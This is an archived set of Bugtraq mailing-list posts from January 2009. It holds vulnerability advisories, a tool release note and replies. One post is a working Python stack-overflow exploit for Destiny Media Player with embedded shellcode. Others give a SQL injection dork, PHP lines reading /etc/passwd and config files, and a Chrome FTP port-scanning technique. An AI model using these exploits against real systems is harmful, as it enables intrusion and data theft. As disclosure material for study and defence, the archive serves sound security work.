>         >> djekmani4ever

This bug is already fixed upstream. More details can be found at:
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2008-5029

Thanks, Eugene

From - Mon Jan  5 11:10:42 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000563c
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39065-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 611E6EC0BB
for <lists@securityspace.com>; Mon,  5 Jan 2009 11:07:46 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 9A38F143A76; Mon,  5 Jan 2009 08:33:17 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 11653 invoked from network); 4 Jan 2009 19:55:20 -0000
Date: 4 Jan 2009 20:17:21 -0000
Message-ID: <20090104201721.10562.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: Ehsan_Hp200@Hotmail.com
To: bugtraq@securityfocus.com
Subject: SolucionWeb (main.php?id_area) Remote SQL injection Vulnerability
Status:   

 ###############################  IRANIAN THE BEST HACKERS IN THE WORLD ##################
#################### ####################
##
## Remote SQL injection Vulnerability
##
## SolucionWeb (main.php?id_area)
##                           
###############################################################
###############################################################
###############################################################
###############################################################
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.only-4dl.tk
##
## Email  : Ehsan_Hp200@Hotmail.com
##  
## Vendor : http://www.solucionweb.com/
##  
## Persian Gulf 4 Ever!
#############################
#############################
#############################
#############################
#############################
#############################
##
##

Dork :  "Powered by SolucionWeb" "inurl:main.php?id_area="

 Exploite:

www.victim.com/main.php?id_area=[SQL]

,##############################################################################
Special tanks to : All Parsi Hacker security Team members,SAHAND SHABAN , The.Mo3tafa , Jasoos Team ,Enigma2
,#######################################################################################################                                                       
 ###############################  IRANIAN THE BEST HACKERS IN THE WORLD ##################

From - Mon Jan  5 11:30:48 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000563e
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39061-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id EB10EEC0BB
for <lists@securityspace.com>; Mon,  5 Jan 2009 11:24:52 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 4CA2D14383C; Mon,  5 Jan 2009 08:31:09 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 3383 invoked from network); 4 Jan 2009 12:51:47 -0000
Date: Sun, 4 Jan 2009 05:57:33 -0700
Message-Id: <200901041257.n04CvXlB000895@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: crimson.loyd@gmail.com
To: bugtraq@securityfocus.com
Subject: Destiny Media Player 1.61 (.lst File) Local Stack Overflow Exploit
Status:   

print "====================================================================="
print " Destiny Media Player 1.61 (.lst File) Local Stack Overflow Exploit\n"
print " Discovered by   : Encrypt3d.M!nd"
print " exploit code by : suN8Hclf"
print " Tested on       : Windows 2000 SP4 Polish"
print " Greetings to    : 0in, Gynvael Coldwind, doctor, Katharsis, SkD"
print "====================================================================="

buffer = "\x41" * 2052
NEW_EIP = "\x33\x08\x3a\x77" #call ESP from atl.dll
nops = "\x90" * 10

# win32_exec -  EXITFUNC=seh CMDlc Size0 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9"
"\x2c\xc9\x40\x83\xeb\xfc\xe2\xf4\x35\xc4\x8d\x40\xc9\x2c\x42\x05"
"\xf5\xa7\xb5\x45\xb1\x2d\x26\xcb\x86\x34\x42\x1f\xe9\x2d\x22\x09"
"\x42\x18\x42\x41\x27\x1d\x09\xd9\x65\xa8\x09\x34\xce\xed\x03\x4d"
"\xc8\xee\x22\xb4\xf2\x78\xed\x44\xbc\xc9\x42\x1f\xed\x2d\x22\x26"
"\x42\x20\x82\xcb\x96\x30\xc8\xab\x42\x30\x42\x41\x22\xa5\x95\x64"
"\xcd\xef\xf8\x80\xad\xa7\x89\x70\x4c\xec\xb1\x4c\x42\x6c\xc5\xcb"
"\xb9\x30\x64\xcb\xa1\x24\x22\x49\x42\xac\x79\x40\xc9\x2c\x42\x28"
"\xf5\x73\xf8\xb6\xa9\x7a\x40\xb8\x4a\xec\xb2\x10\xa1\xdc\x43\x44"
"\x96\x44\x51\xbe\x43\x22\x9e\xbf\x2e\x4f\xa8\x2c\xaa\x02\xac\x38"
"\xac\x2c\xc9\x40"
    )

exploit = buffer + NEW_EIP + nops + shellcode
try:
    out_file = open("open_me.lst",'w')
    out_file.write(exploit)
    out_file.close()
    raw_input("\nNow open open_me.lst file to exploit bug!\n")
except:
    print "WTF?"

From - Mon Jan  5 11:30:48 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000563f
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39063-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 1AE1FEC0BB
for <lists@securityspace.com>; Mon,  5 Jan 2009 11:29:59 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id CD17A1438E8; Mon,  5 Jan 2009 08:32:13 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 6138 invoked from network); 4 Jan 2009 16:08:47 -0000
Message-ID: <4960E420.8000807@secniche.org>
Date: Sun, 04 Jan 2009 22:00:24 +0530
From: Aditya K Sood <0kn0ck@secniche.org>
User-Agent: Thunderbird 2.0.0.19 (Windows/20081209)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, submit@milw0rm.com,
submit@secunia.com, vuln@secunia.com, bugs@securitytracker.com,
cve@mitre.org, submissions@packetstormsecurity.org,
vuldb@securityfocus.com
Subject: Google Chrome FTP PASV IP Malicious Port Scanning Vulnerability.
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - community1.drvgv.com
X-AntiAbuse: Original Domain - securityfocus.com
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - secniche.org
Status:   

Advisory: Google Chrome FTP PASV IP Malicious Port Scanning Vulnerability.

Version Affected:
Google Chrome: 1.0.154.36

Description:
Google Chrome FTP Client is vulnerable to FTP PASV malicious port
scanning vulnerability. The username in the
FTP (ftp://username:password@domain.com) can be manipulated by tampering
it with certain IP address with
specification of port as
(ftp://xxx.xxx.xxx.xxx-22:password@domain.com).The Google Chrome FTP
client make
connection to the rogue FTP server which uses PASV commands to scan
network.Dynamic requests are issued to a
rogue FTP server which accepts connection with different usernames as
the IP address with specified ports to locate
the non existing object on the target domain.

Request 1 : ftp://xxx.xxx.xxx.xxx-21:password@domain.com
Request 2 : ftp://xxx.xxx.xxx.xxx-22:password@domain.com
Request 3 : ftp://xxx.xxx.xxx.xxx-23:password@domain.com
Request 4 : ftp://xxx.xxx.xxx.xxx-25:password@domain.com

JavaScript Port Scanning is used to exploit this issue. A malicious web
page hosted on a specially-coded FTP server
could use this feature to perform a generic port-scan of machines inside
the firewall of the victim.The generated
fraudulent request helps attacker to exhibit internal network
information through sustainable port scanning through
JavaScript.

Proof of Concept:
http://www.secniche.org/gcfpv

Links:
http://secniche.org/gcfps.html
http://evilfingers.com/advisory/index.php

Detection:
SecNiche confirmed this vulnerability affects Google Chrome on Microsoft
Windows XP SP2 platform.
The versions tested are:

Chrome: 1.0.154.36

Disclosure Timeline:
Disclosed: 1 January 2009
Release Date. 4 January 2009

Vendor Response:
Google acknowledges this vulnerability by reproducing the issue. Views
have been exchanged over the
 severity level of this flaw.The chrome ID of this issue is 5978.

Credit:
Aditya K Sood

Disclaimer:
The information in the advisory is believed to be accurate at the time
of publishing based on currently
available information. Use of the information constitutes acceptance for
use in an AS IS condition. There
is no representation or warranties, either express or implied by or with
respect to anything in this
document, and shall not be liable for a ny implied warranties of
merchantability or fitness for a particular
purpose or for any indirect special or consequential damages.

From - Mon Jan  5 11:40:49 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005640
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39067-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 494CAEC0BB
for <lists@securityspace.com>; Mon,  5 Jan 2009 11:39:07 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 8DF4A1437CC; Mon,  5 Jan 2009 08:34:15 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 806 invoked from network); 5 Jan 2009 14:31:51 -0000
X-Authentication-Warning: smtp1.thebunker.net: Host host81-149-215-163.in-addr.btopenworld.com [81.149.215.163] claimed to be [192.168.111.69]
Message-ID: <49621EFD.50300@algroup.co.uk>
Date: Mon, 05 Jan 2009 14:53:49 +0000
From: Adam Laurie <adam@algroup.co.uk>
User-Agent: Thunderbird 2.0.0.18 (X11/20081125)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: ANNOUNCE: RFIDIOt ver 01.v released - Jan 2009
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: ClamAV 0.94.2/8836/Mon Jan  5 12:16:27 2009 on irate.thebunker.net
X-Virus-Status: Clean
X-Spam-Status: No, score=0.8 required=5.0 tests=AWL,BAYES_50,RDNS_DYNAMIC,
SPF_FAIL autolearn=no version=3.2.5
X-Spam-Checker-Version: SpamAssassin 3.2.5 (2008-06-10) on irate.thebunker.net
Status:   

Happy New Year!

Since I haven't done so *all year*, I thought it's about time I release 
something! :P

Actually, for my sins, since my idiocy seems to have now encompassed 
JAVA, I wanted to get this out there... Most of the effort has been in 
figuring out how to get a build environment working without having to do 
a full eclipse and JCOP Tools install (the latter being very hard to 
come by these days), so if you're interested in JCOP JavaCard 
development, take a peek in the Makefile located in the 'java' 
subdirectory of this distro, which aims to make command line development 
easier... I hope it makes sense, but since I'm new to Java development, 
please feel free to point me in the right direction if I'm completely 
off base...

 From CHANGES:

v0.v - January 2009
fix ATS position & length in RFIDIOT.py
add jcopsetatrhist.py - sets ATR History Bytes (ATS) on JCOP cards
add jcop_set_atr_hist.cap - java applet for setting ATR/ATS
add JAVA source for jcop_set_atr_hist.cap
move iso_7816 routines into RFIDIOt (from mrpkey.py)
fix exit status of all test programs and RFIDIOt (should be True on error)

Full details and download here:

   http://rfidiot.org

Enjoy,
Adam
-- 
Adam Laurie                         Tel: +44 (0) 20 7993 2690
Suite 117                           Fax: +44 (0) 1308 867 949
61 Victoria Road
Surbiton
Surrey                              mailto:adam@algroup.co.uk
KT6 4JX                             http://rfidiot.org

From - Mon Jan  5 11:50:43 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005641
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39064-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 86CC7EC0BB
for <lists@securityspace.com>; Mon,  5 Jan 2009 11:43:26 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 3B1D7143931; Mon,  5 Jan 2009 08:32:59 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 11076 invoked from network); 4 Jan 2009 19:17:07 -0000
Date: 4 Jan 2009 19:39:08 -0000
Message-ID: <20090104193908.7771.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: l1un@hotmail.com
To: bugtraq@securityfocus.com
Subject: php 4.x php5.2.x all "show_source()" ,"highlight_file()"
 bypass&#8207;
Status:   

Ahthoer:Super-Crystal
www.arab4services.net
safe_mode off (tested)
<?
show_source ('/etc/passwd');
?>
Example exploit:
<?
show_source ('/home/user/public_html/config.php');
?>
-----------------------------
highlight_file()

   <? 
highlight_file ("/etc/passwd"); 
?> 
exploit !!!  
<code><span style="color: #000000">
root:x:0:0:root:/root:/bin/bash<br />bin:x:1:1:bin:/bin:/sbin/nologin<br />daemon:x:2:2:daemon:/sbin:/sbin/nologin<br />adm:x:3:4:adm:/var/adm:/sbin/nologin<br />lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin<br />sync:x:5:0:sync:/sbin:/bin/sync<br />shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown<br />halt:x:7:0:halt:/sbin:/sbin/halt<br />mail:x:8:12:mail:/var/spool/mail:/sbin/nologin<br />news:x:9:13:news:/etc/news:<br />uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin<br />operator:x:11:0:operator:/root:/sbin/nologin<br />games:x:12:100:games:/usr/games:/sbin/nologin<br />gopher:x:13:30:gopher:/var/gopher:/sbin/nologin<br />ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin<br />nobody:x:99:99:Nobody:/:/sbin/nologin<br />dbus:x:81:81:System message bus:/:/sbin/nologin<br 
 
:)
 
greetz:php.net!

th4nx securityfocus

From - Mon Jan  5 13:10:42 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005642
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39062-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id CB3D3EC0BB
for <lists@securityspace.com>; Mon,  5 Jan 2009 13:06:02 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 843F6143852; Mon,  5 Jan 2009 08:31:48 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 5707 invoked from network); 4 Jan 2009 15:37:58 -0000
Message-ID: <4960DB79.2000002@free.fr>
Date: Sun, 04 Jan 2009 16:53:29 +0100
From: Jerome Athias <jerome.athias@free.fr>
User-Agent: Thunderbird 2.0.0.19 (Windows/20081209)
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Subject: MSFXDC Metasploit eXploits Development Contest
X-Enigmail-Version: 0.95.7
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Status:   

Hi there,

MSFXDC (MetaSploit Framework eXploits Development Contest) is a
challenge where the main goal is to code the largest number of new
Metasploit Framework exploits modules.
https://www.securinfos.info/metasploit/msfxdc.php

Your mission, if you choose to accept it, is to code new exploits
modules for the Metasploit Framework (latest 3.x version).
Exploits modules must be new regarding the current Metasploit Framework
SVN repository content.
(http://metasploit.com/svn/framework3/trunk/ Updated to revision 6062)
(Backup:
https://www.securinfos.info/metasploit/framework-trunk-snapshot-6062.tar.gz)

Exploits modules can be new fresh sploits or old exploits ported to the
MSF v3.x.
(ie: stolen from www.milw0rm.com or MSF v2 modules still not ported to
v3
http://metasploit.com/svn/framework3/trunk/documentation/metasploit2/exploits.txt
)

NOTE: Contesters can take advantage of the MSF-eXploit Builder to
achieve this goal ( https://www.securinfos.info/metasploit/MSF_XB.php )

*** MSFXDC STARTS NOW! ***
and you can submit your stuff to:
msfxdc@ja-psi.com
until February 1st 2009 00H00 GMT

Winner prize:
* Euros 150
* 1 Free VIP Ticket for the FRHACK conference ( http://www.frhack.org )

Points counter:
Working DoS module gives you 1 point
Working web app module gives you 2 points
Working local/remote Exploit gives you 3 points
New fresh exploit (not published before) gives you + 2 points

Classification and all submitted exploits will be publicly provided on:
https://www.securinfos.info/metasploit/msfxdc.php
(including the name/nickname/credits of the coder)

May The MSForce Be With You!
/JA

MSFXDC is organized by JA-PSI, French IT Security Company (
http://www.ja-psi.com ).

Metasploit ™ is a registered trademark. ( http://www.metasploit.com )

From - Mon Jan  5 13:50:42 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005643
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39068-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 79574EC0BB
for <lists@securityspace.com>; Mon,  5 Jan 2009 13:41:18 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 7C4A4143A6A; Mon,  5 Jan 2009 11:38:05 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 8145 invoked from network); 5 Jan 2009 16:08:34 -0000
Date: Mon, 5 Jan 2009 09:14:23 -0700
Message-Id: <200901051614.n05GEN2A002068@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: a@bd.cd
To: bugtraq@securityfocus.com
Subject: Re: php 4.x php5.2.x all "show_source()" ,"highlight_file()"
 bypass&#8207;
Status:   

It is perfectly correct behavior. This "exploit" is pure spam send by incompetent kiddie. 

From - Mon Jan  5 13:50:42 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005644
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39070-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id A181DEC0BB
for <lists@securityspace.com>; Mon,  5 Jan 2009 13:48:04 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 571B4143A70; Mon,  5 Jan 2009 11:39:08 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 12913 invoked from network); 5 Jan 2009 18:10:10 -0000
Date: 5 Jan 2009 18:32:22 -0000
Message-ID: <20090105183222.23848.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: faze0r@aim.com
To: bugtraq@securityfocus.com
Subject: Re: php 4.x php5.2.x all "show_source()" ,"highlight_file()"
 bypass&#8207;
Status:   

how is that an exploit? 

Thats like saying exec("rm -rf /") is a DoS attack... It doesn't count if you do it yourself lol.

From - Mon Jan  5 14:00:42 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005645
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39069-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 9370EEC0BB
for <lists@securityspace.com>; Mon,  5 Jan 2009 13:57:41 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id ED3401437E1; Mon,  5 Jan 2009 11:38:47 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 11450 invoked from network); 5 Jan 2009 17:16:19 -0000
Date: Mon, 5 Jan 2009 10:22:08 -0700
Message-Id: <200901051722.n05HM8gr008347@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: vuln_research@princeofnigeria.org
To: bugtraq@securityfocus.com
Subject: Walusoft TFTPServer2000 Version 3.6.1 Directory Traversal
Status:   

[--Vulnerability Summary--]

Title: Walusoft TFTPServer2000 Version 3.6.1 Directory Traversal

Product: Walusoft TFTPServer2000 Version 3.6.1

Discovered: November 9, 2008
Discovered by: Rob Kraus, princeofnigeria (PoN)

Vendor: Walusoft
Vendor URL: No longer exists (no contact information available)
Public disclosure date: January 5, 2009

Affects: Walusoft TFTPServer2000 Version 3.6.1
Fixed in: No fix currently available.
Risk: Medium

Vulnerability Description: Walusoft TFTPServer2000 Version 3.6.1 are prone to a directory-traversal vulnerability because it fails to sanitize TFTP GET requests. By using a specially crafted TFTP GET request an attacker is capable of retrieving files outside of the TFTP root directory.

Impact: The ability to obtain files outside of the TFTP root directory may allow an attacker to obtain more information about the underlying operating system and applications running on the host.

Keywords: security, vulnerability, tftp, directory traversal, princeofnigeria, gui, windows, server

[--Background--]

Type of vulnerability: Input validation flaw
Who can exploit it: Local and remote users

Walusoft TFTPServer2000 Version 3.6.1 is an application that provides services for transferring configuration files, firmware files and other types of data using the TFTP protocol. The application should restrict GET requests to the contents of the TFTP root directory to prevent obtaining data from other parts of the host operating system.

Vulnerability Scope: The default installation of Walusoft TFTPServer2000 Version 3.6.1 will allow exploitation of this vulnerability. This software is licensed to and re-branded by many VoIP phone systems manufacturers. Verification of the product origin can be obtained by reading the about page.

[--More Details--]

Exploitation of this flaw is trivial and can be executed using any RFC 1350 compliant TFTP client software. No exploit code is required.

[--Fix or Workaround Information--]

Patch availability: None
Vendor provided fix: None
Workarounds: No patch is available at this time. The analyst recommended work around is described as follows:

Upon initial installation, the software fails to define or restrict the TFTP root directory to a specific directory and an attacker is able to gain access to operating system files. To fix this issue the TFTP server administrator show explicitly define the TFTP root directory on the System >> Setup menu, Server Options Outbound tab.

[--Disclosure Policy--]

PrinceofNigeria.org Vulnerability Disclosure Policy
http://www.princeofnigeria.org/blogs/index.php/vulndev/vulnreleasepolicy/?blog=1

[--Disclosure History--]

Public disclosure date: January 5, 2009

[--References--]
CVE-ID:
Bugtraq ID:
Secunia ID:
OSVDB ID:

[--Author--]
Rob Kraus, princeofnigeria (PoN)
Website: www.princeofnigeria.org/blogs

From - Mon Jan  5 16:00:42 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005647
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39071-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id AF37DEC1EE
for <lists@securityspace.com>; Mon,  5 Jan 2009 15:55:33 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 1E2A0236F84; Mon,  5 Jan 2009 13:39:59 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 18474 invoked from network); 5 Jan 2009 19:54:40 -0000
Subject: [USN-702-1] Samba vulnerability
From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
X-Original-To: marc.deslauriers@cleanmail.canonical.com
X-Mailcontrol-Inbound: 
 uq3drnD2P+ps5SfEb0fvr78+NoP1DHBZwGqKpaXB2eTgNv8D6KLIxb8+NoP1DHBZ8VSaBg0k0xwX-Spam-Score: -12.4
X-Scanned-By: MailControl A_08_51_00 (www.mailcontrol.com) on 10.74.0.155
Content-Type: multipart/signed; micalg="pgp-sha1"; protocol="application/pgp-signature"; boundary="=-kQ5tEg1BNWkAxT8Ux/U8"
Date: Mon, 05 Jan 2009 15:16:46 -0500
Message-Id: <1231186606.11166.4.camel@mdlinux.technorage.com>
Mime-Version: 1.0
X-Mailer: Evolution 2.24.2 
Status:   


--=-kQ5tEg1BNWkAxT8Ux/U8
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: quoted-printable

===========================================================
Ubuntu Security Notice USN-702-1           January 05, 2009
samba vulnerability
CVE-2009-0022
===========================================================

